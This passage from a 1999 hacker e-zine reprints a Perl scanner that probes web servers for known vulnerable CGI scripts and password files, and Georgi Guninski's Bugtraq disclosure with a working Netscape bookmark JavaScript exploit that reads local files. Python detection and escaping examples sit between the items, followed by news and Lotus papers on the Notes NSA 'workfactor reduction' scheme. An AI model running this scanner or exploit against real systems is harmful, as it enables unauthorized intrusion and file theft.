else {printf ("...n0thing wr0ng on server..... hmm...sucks!\n");}
}
@HWA
15.1 cgichk.pl PERL version of the above cgi scanner from Wiltered Fire
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#!/usr/bin/perl
##############################################
# #
# CGI scanner in perl #
# Written By: Epicurus (epicurus@wilter.com) #
# #
# Based on a C version by su1d sh3ll #
# #
##############################################
use Socket;
@cgi_scripts = ("GET /cgi-bin/rwwwshell.pl HTTP/1.0\n\n","GET /cgi-bin/phf HTTP/1.0\n\n",
"GET /cgi-bin/Count.cgi HTTP/1.0\n\n","GET /cgi-bin/test-cgi HTTP/1.0\n\n",
"GET /cgi-bin/nph-test-cgi HTTP/1.0\n\n","GET /cgi-bin/nph-publish HTTP/1.0\n\n",
"GET /cgi-bin/php.cgi HTTP/1.0\n\n","GET /cgi-bin/handler HTTP/1.0\n\n",
"GET /cgi-bin/webgais HTTP/1.0\n\n","GET /cgi-bin/websendmail HTTP/1.0\n\n",
"GET /cgi-bin/webdist.cgi HTTP/1.0\n\n","GET /cgi-bin/faxsurvey HTTP/1.0\n\n",
"GET /cgi-bin/htmlscript HTTP/1.0\n\n","GET /cgi-bin/pfdispaly.cgi HTTP/1.0\n\n",
"GET /cgi-bin/perl.exe HTTP/1.0\n\n","GET /cgi-bin/wwwboard.pl HTTP/1.0\n\n",
"GET /cgi-bin/www-sql HTTP/1.0\n\n","GET /cgi-bin/view-source HTTP/1.0\n\n",
"GET /cgi-bin/campas HTTP/1.0\n\n","GET /cgi-bin/aglimpse HTTP/1.0\n\n",
"GET /cgi-bin/glimpse HTTP/1.0\n\n","GET /cgi-bin/man.sh HTTP/1.0\n\n",
"GET /cgi-bin/AT-admin.cgi HTTP/1.0\n\n","GET /cgi-bin/filemail.pl HTTP/1.0\n\n",
"GET /cgi-bin/maillist.pl HTTP/1.0\n\n","GET /cgi-bin/jj HTTP/1.0\n\n",
"GET /cgi-bin/info2www HTTP/1.0\n\n","GET /cgi-bin/files.pl HTTP/1.0\n\n",
"GET /cgi-bin/finger HTTP/1.0\n\n","GET /cgi-bin/bnbform.cgi HTTP/1.0\n\n",
"GET /cgi-bin/survey.cgi HTTP/1.0\n\n",
"GET /cgi-bin/AnyForm2 HTTP/1.0\n\n",
"GET /cgi-bin/textcounter.pl HTTP/1.0\n\n","GET /cgi-bin/classifieds.cgi HTTP/1.0\n\n",
"GET /cgi-bin/environ.cgi HTTP/1.0\n\n","GET /cgi-bin/wrap HTTP/1.0\n\n",
"GET /cgi-bin/cgiwrap HTTP/1.0\n\n","GET /cgi-bin/guestbook.cgi HTTP/1.0\n\n",
"GET /cgi-bin/edit.pl HTTP/1.0\n\n","GET /cgi-bin/perlshop.cgi HTTP/1.0\n\n",
"GET /_vti_inf.html HTTP/1.0\n\n","GET /_vti_pvt/service.pwd HTTP/1.0\n\n",
"GET /_vti_pvt/users.pwd HTTP/1.0\n\n","GET /_vti_pvt/authors.pwd HTTP/1.0\n\n",
"GET /_vti_pvt/administrators.pwd HTTP/1.0\n\n","GET /_vti_bin/shtml.dll HTTP/1.0\n\n",
"GET /_vti_bin/shtml.exe HTTP/1.0\n\n","GET /cgi-dos/args.bat HTTP/1.0\n\n",
"GET /cgi-win/uploader.exe HTTP/1.0\n\n","GET /cgi-bin/rguest.exe HTTP/1.0\n\n",
"GET /cgi-bin/wguest.exe HTTP/1.0\n\n","GET /scripts/issadmin/bdir.htr HTTP/1.0\n\n",
"GET /scripts/CGImail.exe HTTP/1.0\n\n","GET /scripts/tools/newdsn.exe HTTP/1.0\n\n",
"GET /scripts/fpcount.exe HTTP/1.0\n\n","GET /cfdocs/expelval/openfile.cfm HTTP/1.0\n\n",
"GET /cfdocs/expelval/exprcalc.cfm HTTP/1.0\n\n","GET /cfdocs/expelval/displayopenedfile.cfm HTTP/1.0\n\n",
"GET /cfdocs/expelval/sendmail.cfm HTTP/1.0\n\n","GET /iissamples/exair/howitworks/codebrws.asp HTTP/1.0\n\n",
"GET /iissamples/sdk/asp/docs/codebrws.asp HTTP/1.0\n\n","GET /msads/Samples/SELECTOR/showcode.asp HTTP/1.0\n\n",
"GET /search97.vts HTTP/1.0\n\n","GET /carbo.dll HTTP/1.0\n\n");
@cgi_names = ("THC - backdoor ","phf ","Count.cgi ","test-cgi ","nph-test-cgi ",
"nph-publish ","php.cgi ","handler ","webgais ","websendmail ",
"webdist.cgi ","faxsurvey ","htmlscript ","pfdisplay ","perl.exe ",
"wwwboard.pl ","www-sql ","view-source ","campas ","aglimpse ",
"glimpse ","man.sh ","AT-admin.cgi ","filemail.pl ","maillist.pl ",
"jj ","info2www ","files.pl ","finger ","bnbform.cgi ",
"survey.cgi ","AnyForm2 ","textcounter.pl ","classifields.cgi","environ.cgi ",
"wrap ","cgiwrap ","guestbook.cgi ","edit.pl ","perlshop.cgi ",
"_vti_inf.html ","service.pwd ","users.pwd ","authors.pwd ","administrators ",
"shtml.dll ","shtml.exe ","args.bat ","uploader.exe ","rguest.exe ",
"wguest.exe ","bdir - samples ","CGImail.exe ","newdsn.exe ","fpcount.exe ",
"openfile.cfm ","exprcalc.cfm ","dispopenedfile ","sendmail.cfm ","codebrws.asp ",
"codebrws.asp 2 ","showcode.asp ","search97.vts ","carbo.dll ");
print "CGI scanner [in Perl] v1.0\n\n";
print "Host: ";
chomp($remote=<STDIN>);
print "HTTP Port [80]: ";
chomp($port=<STDIN>);
if($port eq "")
{
$port=80;
}
print "Log Session?(y/n)";
$yn=<STDIN>;
if($yn =~ /y/i)
{
$log = 1;
$logfile="$remote".".scan";
print "Log File [$logfile]: ";
$file=<STDIN>;
chop($file) if $file =~ /\n$/;
if($file ne "")
{
$logfile=$file;
}
open(LOG,">>$logfile") || die("Unable to write to $logfile!");
print LOG "Scanning $remote port $port\n\n";
}
print "Press [enter] to check the httpd version...\n";
$blah=<STDIN>;
$submit = "HEAD / HTTP/1.0\r\n\r\n";
if($port =~ /\D/) { $port = getservbyname($port, 'tcp') }
&error("No port specified.") unless $port;
$iaddr = inet_aton($remote) || &error("Failed to find host: $remote");
$paddr = sockaddr_in($port, $iaddr) || &error("Some fucking thing!");
$proto = getprotobyname('tcp') || &error("Unable to get protocall!");
socket(SOCK, PF_INET, SOCK_STREAM, $proto) || &error("Failed to open socket: $!");
connect(SOCK, $paddr) || &error("Unable to connect: $!");
send(SOCK,$submit,0);
while(<SOCK>)
{
print $_;
print LOG $_ if $log==1;
}
close(SOCK);
print "Press [enter] to check for CGI vulnerabilities...\n";
$blah=<STDIN>;
$i=0;
foreach $cgi_script(@cgi_scripts)
{
print "Searching for $cgi_names[$i] : ";
print LOG "Searching for $cgi_names[$i] : " if $log==1;
$submit=$cgi_script;
&connect_n_check;
$i++;
}
if($bad_security>0)
{
print "Server may have CGI vulnerabilities.\n";
print LOG "Server may have CGI vulnerabilities.\n\n" if $log==1;
}
else
{
print "No known CGI vulnerabilities found.\n";
print LOG "No known CGI vulnerabilities found.\n\n" if $log==1;
}
close(LOG) if $log==1;
exit;
sub connect_n_check
{
if($port =~ /\D/) { $port = getservbyname($port, 'tcp') }
&error("No port specified.") unless $port;
$iaddr = inet_aton($remote) || &error("Failed to find host: $remote");
$paddr = sockaddr_in($port, $iaddr) || &error("Some fucking thing!");
$proto = getprotobyname('tcp') || &error("Unable to get protocall!");
socket(SOCK, PF_INET, SOCK_STREAM, $proto) || &error("Failed to open socket: $!");
connect(SOCK, $paddr) || &error("Unable to connect: $!");
send(SOCK,$submit,0);
$check=<SOCK>;
($http,$code,$blah) = split(/ /,$check);
if($code == 200)
{
print "Found!\n";
print LOG "Found!\n" if $log==1;
$bad_security++;
}
else
{
print "Not Found\n";
print LOG "Not Found\n" if $log==1;
}
close(SOCK);
}
sub error
{
$error = shift(@_);
print "Error - $error\n";
print LOG "Error - $error\n\n" if $log==1;
close(LOG) if $log==1;
exit;
}
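Both scanners above (the C checker and its Perl port) send one request per known path and report "Found" whenever the server answers 200. As an added example, not part of either scanner or of this issue, here is the defender's side of the same list in Python: parse common-log-format access log lines and flag any client that walks the probe list in a burst, listing the paths that answered 200 since those are exactly what the scanner would have reported. The log lines, client addresses and threshold are constructed for the example.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Paths probed by the scanners above (a subset of their list); an ordinary
# visitor rarely requests several of these within a short time.
KNOWN_PROBE_PATHS = {
    "/cgi-bin/phf", "/cgi-bin/test-cgi", "/cgi-bin/nph-test-cgi",
    "/cgi-bin/Count.cgi", "/cgi-bin/php.cgi", "/cgi-bin/handler",
    "/cgi-bin/view-source", "/cgi-bin/finger", "/_vti_pvt/service.pwd",
    "/_vti_pvt/users.pwd", "/_vti_pvt/administrators.pwd",
    "/scripts/tools/newdsn.exe", "/cfdocs/expelval/openfile.cfm", "/carbo.dll",
}

# NCSA common log format: host ident authuser [date] "request" status bytes
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)(?: \S+)?" (?P<status>\d{3}) \S+'
)


def parse_line(line):
    """Parse one access-log line; return None for lines that do not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return {
        "host": m["host"],
        "time": datetime.strptime(m["time"], "%d/%b/%Y:%H:%M:%S %z"),
        "path": m["path"].split("?", 1)[0],   # ignore the query string
        "status": int(m["status"]),
    }


def detect_cgi_scans(lines, threshold=5, window_seconds=60):
    """Return one alert per client that requested at least `threshold` known
    probe paths inside any `window_seconds` interval.  'exposed' lists the probe
    paths that answered 200: those are what the scanners above would have
    printed as 'Found', so they are the first thing to verify on the server."""
    by_host = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec and rec["path"] in KNOWN_PROBE_PATHS:
            by_host[rec["host"]].append(rec)

    window = timedelta(seconds=window_seconds)
    alerts = []
    for host, recs in by_host.items():
        recs.sort(key=lambda r: r["time"])
        start = 0
        for end in range(len(recs)):
            # slide the window start forward until the span fits in the window
            while recs[end]["time"] - recs[start]["time"] > window:
                start += 1
            if end - start + 1 >= threshold:
                alerts.append({
                    "host": host,
                    "first_seen": recs[start]["time"].isoformat(),
                    "probes": len(recs),
                    "exposed": sorted({r["path"] for r in recs if r["status"] == 200}),
                })
                break   # one alert per client is enough
    return alerts


# Constructed sample log: one client walking the probe list in a few seconds
# (one path answers 200), and one ordinary visitor whose page uses Count.cgi.
SAMPLE_LOG = """\
10.0.0.5 - - [22/May/1999:10:00:00 +0000] "HEAD / HTTP/1.0" 200 0
10.0.0.5 - - [22/May/1999:10:00:01 +0000] "GET /cgi-bin/phf HTTP/1.0" 404 209
10.0.0.5 - - [22/May/1999:10:00:01 +0000] "GET /cgi-bin/Count.cgi HTTP/1.0" 404 209
10.0.0.5 - - [22/May/1999:10:00:02 +0000] "GET /cgi-bin/test-cgi HTTP/1.0" 200 512
10.0.0.5 - - [22/May/1999:10:00:02 +0000] "GET /cgi-bin/nph-test-cgi HTTP/1.0" 404 209
10.0.0.5 - - [22/May/1999:10:00:03 +0000] "GET /_vti_pvt/service.pwd HTTP/1.0" 404 209
10.0.0.5 - - [22/May/1999:10:00:03 +0000] "GET /carbo.dll HTTP/1.0" 404 209
192.0.2.10 - - [22/May/1999:10:05:00 +0000] "GET /index.html HTTP/1.0" 200 1043
192.0.2.10 - - [22/May/1999:10:05:01 +0000] "GET /cgi-bin/Count.cgi?df=home.dat HTTP/1.0" 200 88
"""

if __name__ == "__main__":
    for alert in detect_cgi_scans(SAMPLE_LOG.splitlines()):
        print(alert)
```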
@HWA
16.0 Vulnerability in Netscape bookmarks found by Georgi Guninski...
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Date: Sun, 16 May 1999 17:17:34 +0300
From: Georgi Guninski <joro@NAT.BG>
To: BUGTRAQ@netspace.org
Subject: Netscape Communicator bookmarks <TITLE> security vulnerability
There is a security bug in Netscape Communicator 4.51 Win95, 4.07 Linux
(guess all 4.x versions are affected) in the way they handle special
bookmarks with JavaScript code in the title.
If you enclose a JavaScript code with <SCRIPT> tags in the <TITLE>
tag and bookmark that page, the JavaScript code is written in the local
bookmarks file.
Then when the bookmarks file is open, the JavaScript code is executed in
the security context of a local file - the bookmarks file.
The bookmarks file may be open by a script, probably a server redirect
or by the user.
The bookmarks file name must be known, but it is easily guessed for most
dialup users.
Vulnerabilities: reading user's bookmarks, browsing local directories,
reading local files (works fine on Linux, probably possible on Windows).
Workaround: Disable JavaScript or do not bookmark untrusted pages.
Demonstration is available at: http://www.nat.bg/~joro/book2.html
See attached file for the source.
Georgi Guninski
http://www.nat.bg/~joro
http://www.whitehats.com/guninski
--------------------------------------------------------------------------
<http://www.nat.bg/~joro/book2.html>
<HTML><HEAD>
<TITLE>
<SCRIPT>
alert('Bookmarks got control');
s='Here are some bookmarks: \n';
for(i=1;i<7;i++)
s += document.links[i]+'\n';
alert(s);
dirToRead='wysiwyg://2/file://c:/';
a=window.open(dirToRead);
s='Here are some files in C:\\ :\n';
for(i=1;i<7;i++)
s += a.document.links[i]+'\n';
a.close();
alert(s);
</SCRIPT>
</TITLE></HEAD>
<BODY>
There is a security bug in Netscape Communicator 4.51 Win95, 4.07 Linux (guess all 4.x versions are affected) in the way they handle special bookmarks
with Javascript code in the title.
<br>If you enclose a JavaScript code with <SCRIPT> tags in the <TITLE>
tag and bookmark that page, the JavaScript code is written in the local bookmarks file.
Then when the bookmarks file is open, the JavaScript
code is executed in the security context of a local file. The bookmarks
file may be open by a script, probably a server redirect or by the user.
The bookmarks file name must be known - easily guessed for most dialup
users.
<p>Vulnerability: reading user's bookmarks, browsing local directories,
reading local files (works fine on Linux, probably possible on Windows).
<br>
Workaround: Disable JavaScript or do not bookmark untrusted pages.
<br>
<hr WIDTH="100%">
<br>To test it:
<br>1) Bookmark this page.
<br>2) Close all NC windows and restart NC.
<br>3) Open bookmarks file (change the filename in the field below if needed
and click "Open bookmarks", or use File| Open Page... )
<br>
<hr WIDTH="100%">
<FORM>
Enter the file name of your bookmarks file:
<INPUT TYPE=TEXT SIZE=70 VALUE='c:\Program Files\Netscape\Users\default\bookmark.htm'>
</FORM>
<SCRIPT>
function openBookmarks() {
/* bmFile='c:\\Program Files\\Netscape\\Users\\default\\bookmark.htm'; */
a=window.open('wysiwyg://1/file:///'+document.forms[0].elements[0].value);
}
</SCRIPT>
<A HREF="javascript:openBookmarks()">Open bookmarks</A>
</BODY>
<hr WIDTH="100%">
<A HREF="http://www.nat.bg/~joro">Go to Georgi Guninski's home page</A>
</HTML>
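The bug Guninski describes is a missing output encoding: the page's <TITLE> text is copied verbatim into a local HTML file that Communicator later renders with local-file privileges. The following Python is an added example, not part of the post or of Netscape's code; it contrasts the verbatim write with an escaped one and audits an existing bookmark.htm for titles that carry script. The simplified entry layout, the sample file and the example.invalid URLs are assumptions constructed for the example.

```python
import html
import re

# Simplified Netscape bookmark.htm entry layout (assumption: the real file also
# carries ADD_DATE attributes and nested <DL> folders, which do not change the
# escaping point demonstrated here).
ENTRY = '<DT><A HREF="{href}">{title}</A>'

# Constructed title in the shape of the post's demo page (Communicator stores
# the whole <TITLE> text, tags included).
HOSTILE_TITLE = "<SCRIPT>alert('Bookmarks got control');</SCRIPT>"
SCRIPT_TAG = re.compile(r"<\s*script\b", re.IGNORECASE)


def bookmark_entry_unsafe(title, url):
    """The behaviour the post describes: the page title is copied verbatim into
    the local HTML bookmarks file, so a <SCRIPT> in it becomes live markup that
    runs with local-file privileges when bookmark.htm is opened."""
    return ENTRY.format(href=url, title=title)


def bookmark_entry_safe(title, url):
    """Hardened form: HTML-escape everything copied from the untrusted page so
    the title is stored as inert text (and the URL cannot break the attribute)."""
    return ENTRY.format(href=html.escape(url, quote=True),
                        title=html.escape(title, quote=True))


def contains_active_content(entry):
    """True if an entry still contains an unescaped script tag."""
    return bool(SCRIPT_TAG.search(entry))


def audit_bookmarks_file(text):
    """Detection for an existing bookmarks file: return the HREFs of entries
    whose title region carries a script tag, i.e. bookmarks saved from pages
    that used this trick."""
    suspicious = []
    for m in re.finditer(r'<A HREF="([^"]*)"[^>]*>(.*?)</A>', text,
                         re.IGNORECASE | re.DOTALL):
        if SCRIPT_TAG.search(m.group(2)):
            suspicious.append(m.group(1))
    return suspicious


# Constructed sample file with one benign and one hostile entry, both written
# the unsafe way (the doctype line is the one Netscape bookmark files use).
SAMPLE_FILE = "\n".join([
    "<!DOCTYPE NETSCAPE-Bookmark-file-1>",
    "<DL><p>",
    bookmark_entry_unsafe("Plain page", "http://example.invalid/ok"),
    bookmark_entry_unsafe(HOSTILE_TITLE, "http://example.invalid/page"),
    "</DL><p>",
])

if __name__ == "__main__":
    print("unsafe: ", bookmark_entry_unsafe(HOSTILE_TITLE, "http://example.invalid/page"))
    print("safe:   ", bookmark_entry_safe(HOSTILE_TITLE, "http://example.invalid/page"))
    print("flagged:", audit_bookmarks_file(SAMPLE_FILE))
```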
@HWA
17.0 Lotus Notes in bed with the NSA on encryption keys
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
(From Packet Storm Security http://www.genocide2600.com/~tattooman/new.shtml)
http://www.wired.com/news/print_version/politics/story/19602.html?wnpg=all
Spying on the Spies
by Niall McKay
12:15 p.m. 10.May.99.PDT
The National Security Agency has its ear to the world, but doesn't listen to everyone at once.
That was one conclusion of a new report, Interception Capabilities 2000, accepted late last week by the European Parliament's Science and Technology Options Assessment Panel (STOA).
The panel commissioned Duncan Campbell, a British investigative reporter, to prepare a report on Echelon, the US-led satellite surveillance network.
"I have no objection to these systems monitoring serious criminals and terrorists," said Glyn Ford, a British Labour Party member of parliament and a committee member of STOA. "But what is missing here is accountability, clear guidelines as to who they can listen to, and in what circumstances these laws apply."
Campbell was asked to investigate the system in the wake of charges made last year in the European Parliament that Echelon was being used to funnel European government and industry secrets into US hands.
"What is new and important about this report is that it contains the first ever documentary evidence of the Echelon system," said Campbell. Campbell obtained the document from a source at Menwith Hill, the principal NSA communications monitoring station, located near Harrogate in northern England.
The report details how intelligence agencies intercept Internet traffic and digital communications, and includes screen shots of traffic analysis from NSA computer systems.
Interception Capabilities 2000 also provides an account of a previously unknown, secret international organization led by the FBI. According to Campbell, the "secret" organization, called ILETS (International Law Enforcement Telecommunications Seminar), is working on building backdoor wiretap capabilities into all forms of modern communications, including satellite communications systems.
"[The report] is undoubtedly the most comprehensive look at Echelon to date because of its attention to detail -- [and] the NSA's use of technology," said John Young, a privacy activist in New York.
Although the United States has never officially acknowledged Echelon's existence, dozens of investigative reports over the past decade have revealed a maze-like system that can intercept telephone, data, cellular, fax, and email transmissions sent anywhere in the world.
Previously, Echelon computers were thought to be able to scan millions of telephone lines and faxes for keywords such as "bomb" and "terrorist." But Campbell's report maintains that the technologies to perform such a global dragnet do not exist.
Instead, Campbell said that the system targets the communications networks of known diplomats, criminals, and industrialists of interest to the intelligence community.
The report charges that popular software programs such as Lotus Notes and Web browsers include a "back door," through which the NSA can gain access to an individual's personal information.
Citing a November 1997 story in the Swedish newspaper, Svenska Dagbladet, the report said that "Lotus built in an NSA 'help information' trapdoor to its Notes system, as the Swedish government discovered to its embarrassment."
The report goes on to describe a feature called a "workfactor reduction field" that is built into Notes and incorporated into all email sent by non-US users of the system. The feature reportedly broadcasts 24 of the 64 bits of the key used for each communication, and relies on a public key that can only be read by the NSA.
Lotus could not be reached for comment.
The new report emerges as politicians on both sides of the Atlantic are growing increasingly concerned about Echelon and its capabilities.
"I believe that it's time that there is some congressional scrutiny of the Echelon project and I am examining a way to do that," said Representative Bob Barr (R-Georgia). "I understand the need for secrecy -- I was with the CIA myself -- but Echelon has raised some questions about fundamental policy and constitutional rights."
Barr is concerned that the NSA is using its Echelon partners to help it sidestep laws that forbid the US government from spying on its own people.
So far, there has been very little scrutiny of spy systems in the United States, according to Patrick Poole, a privacy advocate and lecturer in government and economics at Bannock Burn College in Franklin, Tennessee.
"The only significant examination of spy systems in the United States was the Church Report, which was prompted by Watergate in the early '70s," said Poole. "I hope that Europe's interest in the Echelon system will spark some new debate in the US."
Echelon is believed to be principally operated by the NSA and its British counterpart, the Government Communications Headquarters. The system also reportedly relies on agreements with similar agencies in other countries, including Canada's Communications Security Establishment, Australia's Defense Signals Directorate, and New Zealand's Government Communications Security Bureau.
(From Packet Storm Security http://www.genocide2600.com/~tattooman/new.shtml)
Hello,
1st off please don't publish my name on your site. I'm too lazy to
set up another cheezy mail acct.
Today I downloaded cryptography/nsa/lotus.notes.backdoor.txt from
your site. I have a close friend who is a developer for Iris (the
people who make Notes for lotus.) I sent him the file I downloaded and
asked him what the deal was, and here's his response:
Here's the necessary info to truly understand the issue here; a speech by Ray
Ozzie and Charlie Kaufman's white paper on the topic. What it comes down to is
that notes provides superior exportable encryption technology when compared to
other US products on the market. For anyone (but the NSA) to crack our
international encryption keys they must crack a 64 bit key, the same as with a
US encryption key. In the international version we take 24 of the 64 bit
encryption key and encrypt the 24 bits with the NSA's public key and send it,
encrypted strongly, along with the encrypted message. This means the NSA can
decrypt with their key and have 24 of the 64 bit key. They still have to break
the remaining 40 bits. 40 bit key encryption has been the max for exportable
encryption and that is what all other US exportable encryption providers
allow.
That limit has just been raised to 56 bits and we are incorporating that as I
type. In the worst case: the NSA's private key is compromised, the 40 bit
portion of the key still must be cracked. So we haven't weakened the security
of international encryption, but actually made it equal to the US security (to
everyone but the NSA). We are proud of this arrangement because we have found
a way to make Notes as secure as the US government will allow for our
international customers. If we hadn't used this technique all of the
international notes encrypted data would be with only a 40 bit key. As it
stands, the 64 bit key used in both US and international encryption is
extremely secure.
It's too bad the author of this article chose to attack Lotus Notes without
considering the options the US government provides. We could have just
shipped 40 bit encryption like MS, Netscape, etc. and left our international
customers with weak encryption, but we didn't. Oh well, you can't make everyone
understand this confusing and frustrating stuff. I hope this helps.
-<deleted his name>
*** Prepared Remarks of Ray Ozzie,
*** President of Iris Associates
*** an affiliate of Lotus Development Corporation
*** Delivered at opening of the RSA Data Security Conference '96
***
<keynote>
SAN FRANCISCO, Jan. 17, 1996 -- As we're all painfully aware, the U.S.
government continues to maintain that cryptography should be
classified and controlled as a munition of war -- and for good
historical reason: Some of cryptography's finest hours have been
during past wars.
From the government's standpoint, the export controls implied by
munitions classification must be working very well, since there has
been no mass-deployed worldwide cryptography, most general
communications is still in cleartext, and no world of unbreakable
crypto has emerged.
In the meantime, while we're preoccupied by protecting the flow of
bits across borders, trouble is brewing. Criminals don't recognize
borders but operate in one wild-and-woolly network. Crackers are able
to attack targets halfway around the world with no fear of
prosecution. Exceptionally smart people in Eastern Europe crack
financial systems in New York.
Everywhere you look, bright, clever people are breaking into
communication systems, industrial control systems, transportation
systems, health care systems -- anything and everything that's
controlled by networked computers. And as you know, this isn't a
theoretical problem, or just a problem with clever people stealing
money from banks; it's a "clear and present danger" that's a direct
result of our having moved into the information age without adequately
securing our information and our global information systems.
This is not just an issue of signals Intelligence or of Title III
wiretaps or of lost software industry profits; this is a public safety
issue.
One of these days, someone is going to bring down an airliner
somewhere in the world, or cause a train wreck, or destabilize an
economy, by breaking into an information system through the worldwide
net. And it may be something that we could have prevented, if we had
been making more casual and widespread use of cryptography.
And that's why I, and a number of you, spend so much time trying to
change the system -- trying to educate, to help convince the U.S.
Government to liberalize export controls, to allow our customers
worldwide to have access to good security, to protect themselves
against the threats present on the worldwide networks.
To be sure, the customers are getting more and more astute. Due in
large part to the press surrounding the cracking of a few 40-bit RC4
keys last year, our customers have lost confidence in 40-bit crypto.
They told us that, if we were going to continue to market 40-bit Lotus
Notes overseas, we should stop marketing it as a secure system -- that
we should start to call it "data scrambling" or "data masking" instead
of encryption. And so we have continued to lobby, arguing that the
benefits of substantially better exportable crypto outweigh the risks.
The government's response? Well, their latest proposal might -- in
theory -- allow us to ship a 64-bit product overseas so long as it had
third-party key escrow features built in. We talked to our customers
about the administration's proposal, and the answer was very clear:
our customers have said a resounding "no" to key escrow in Lotus
Notes.
They simply don't like the notion that they can't compute the
additional risk and liability introduced by a third party holding the
keys to unlock their data. Well, that left us in a bind.
We need to provide better security for our international customers,
but the government's proposal was clearly unacceptable to them.
And because I didn't see a "silver bullet" solution -- or general
export relief -- in the cards, I began looking for an interim solution
that might allow us to ship a more secure product in the short term,
while we continued to argue for substantial revision of national
cryptography policy.
And after months of negotiation, I'm here to announce that we have
found a short-term workaround to the problem, which I hope you will
find to be an interesting, new development in the area of cryptography
as it pertains to export controls.
While this is a very tough issue, and while I personally believe that
a world of widespread cryptography is truly inevitable, the name of
the game right now is to find a compromise solution that satisfies the
stated needs of the U.S. Government, while still providing good
information security.
This is just such a compromise.
Lotus Notes Release 4, which is now shipping, utilizes a new method of
security that we're referring to as "Differential Workfactor
Cryptography." It is a conceptually simple solution that addresses two
problems at the same time: First, it protects sensitive corporate
information from most malicious crackers far more effectively than
previously exported products; second, it permits the government to
retain its current level of access to encrypted information carried by
U.S. products overseas.
No more access, no less access.
As you know, the U.S. government has defined its "maximum tolerance
level" for exportable unescrowed cryptography at 40 bits. That is,
because they generally permit the export of 40-bit products, the U.S.
government is clearly already willing to deal with a 40-bit work
factor in order to examine encrypted communications outside of this
country.
So, the system that we're shipping in Lotus Notes Release 4 overseas
is one that presents different work factors to different parties,
hence the name.
Against crackers -- against the run-of-the-mill adversary trying to
break a message -- the work factor is 64 bits, just like it is in the
U.S. That is, in the new International Edition of Lotus Notes, bulk
data keys are now 64 bits just as they are in our North American
Edition that's sold in the U.S. and Canada.
But when the U.S. Government needs access to a communications stream
overseas encoded by the international edition of Lotus Notes, they are
no worse off - and no better off - than they are today - they have to
crack 40 bits.
So how can this be true, when the work factor is 64 bits for
non-governmental adversaries? It's pretty simple. We asked the
government to generate a special RSA key pair, and to make known their
RSA Public Key. We asked them to keep their private key classified,
compartmentalized -- as secret as they'd keep the keys to their own
military and diplomatic communication systems -- and to never disclose
it to anyone.
Then, we changed Notes so that whenever the product generates an
encrypted 64-bit bulk data key, bound to that key is a small package
-- a "workfactor reduction field" -- containing 24 bits of the bulk
data key encrypted with the U.S. government's public key. So the U.S.
government has exclusive access to 24 of the 64 bits.
That's 64 bits against the cracker, 40 bits for the government.
And, of course, this version of Notes is fully interoperable with the
North American Edition of Notes, the only version that we sell in the
United States.
In the North American Edition, as always, keys generated for
communications within the U.S. and Canada aren't subject to any kind
of work factor reduction. And both the North American Edition and the
International Edition are shipping today.
We are very pleased that we are now able to offer this increased level
of security to our overseas customers. And I encourage you out there
-- product designers and developers who are in a similar bind -- to
offer stronger confidentiality features to your customers in your
exported products by taking advantage of our already having negotiated
export approval for this Differential Workfactor implementation.
But please make no mistake about it: We fully recognize that this is a
compromise solution. This is not a panacea. This is not the "silver
bullet" that addresses all needs.
We continue to argue vigorously that global and national economic
security, domestic law enforcement related to Information security
crimes, and personal privacy concerns would all be served well by the
rapid and broad, worldwide proliferation of good, strong, high-grade
cryptography. And we continue to push for a complete and public review
of national cryptography policy.
But we relish the fact that, in today's highly-charged political
climate surrounding the issue of cryptography, we were able to
negotiate a solution that increases information security for our
worldwide customers. By throwing another potential solution into the
mix -- by leading the way for others by clearing its export approval
-- we hope that this stirs debate related to national cryptography
policy.
A debate that is both global and local in nature; a debate that, with
your help, we can hopefully bring to the attention of the U.S. Public.
Updated: 01/17/96 01:14:15 PM
</keynote>
***
*** White Paper by Charlie Kaufman, distributed at the RSA '96
conference
***
<whitepaper>
Differential Workfactor Cryptography
Charlie Kaufman
Security Architect
Iris Associates
January 17, 1996
Abstract: This document describes the technical approach behind the
exportable strong cryptography included in Lotus Notes Release 4
(International Edition). Current U.S. export regulations generally prohibit
the export of cryptographic software that uses keys larger than 40 bits,
but advances in processor technology make 40 bit keys breakable by
exhaustive search practical for a growing collection of potential
attackers. In a novel scheme we sometimes refer to as 64/40, we provide
the cryptographic strength of 64 bit keys against most attackers while to
comply with export regulations we make the workfactor for breaking the
system equivalent to only 40 bits for the U.S. government. We do that
by encrypting 24 of the 64 bits under a public RSA key provided by the
U.S. government and binding the encrypted partial key to the encrypted data.
Background: As we're all painfully aware, the U.S. government continues
to maintain that cryptography should be classified and controlled as a
munition of war. There is a long historical basis for this - some of
cryptography's finest hours have been during the wars of the past. And
while some would argue that export controls are a sham because many
foreign governments impose no such restrictions and we participate in an
international marketplace, by one very important measure export controls
have been a success: no mass-deployed worldwide cryptography has emerged
and most general communications is still in cleartext.
But while the government has been successfully defending its ability to
spy, trouble has been brewing. Criminals don't recognise borders - there's
only one wild and wooly network. Crackers are able to attack targets
halfway around the world with no fear of prosecution. Smart people in
Eastern Europe crack financial systems in New York. Everywhere you
look, bright clever people are breaking into communication systems,
industrial control systems, transportation systems, health care systems,
anything and everything that's controlled by networked computers. This is
not a theoretical problem, or just a problem with clever people stealing
money from banks; it's a clear and present danger that's a direct result of
the fact that we've moved into the information age without adequately
securing our global information systems.
Lotus Notes has been a pioneer in providing transparent strong RSA based
cryptography in its product offering. It went to great lengths to provide
the strongest protection legally permissible. There is an International
Edition that complies with export regulations and a domestic edition that
does not (called the North American Edition because it is legally available
in the U.S. and Canada). In the International Edition, users use two RSA
key pairs - one used to protect data integrity and authentication and
another (shorter) one to protect data confidentiality because only data
confidentiality key sizes are regulated by export controls. Full
interoperability between the North American and International Editions is
achieved by having the two ends negotiate down to the largest key size that
both ends support. This design came at no small cost, but it was the only
way we could deliver the best security possible to each of our customers
given the existing regulatory climate.
Differential Workfactor Cryptography is another innovation in the direction
of giving our customers the best security we can while continuing to oppose
the regulations that make the complexity necessary.
How it works: The idea behind Differential Workfactor Cryptography is
simple; whenever a bulk data key is created, a 64 bit random number is
chosen. If the use of that key is one involving data confidentiality and
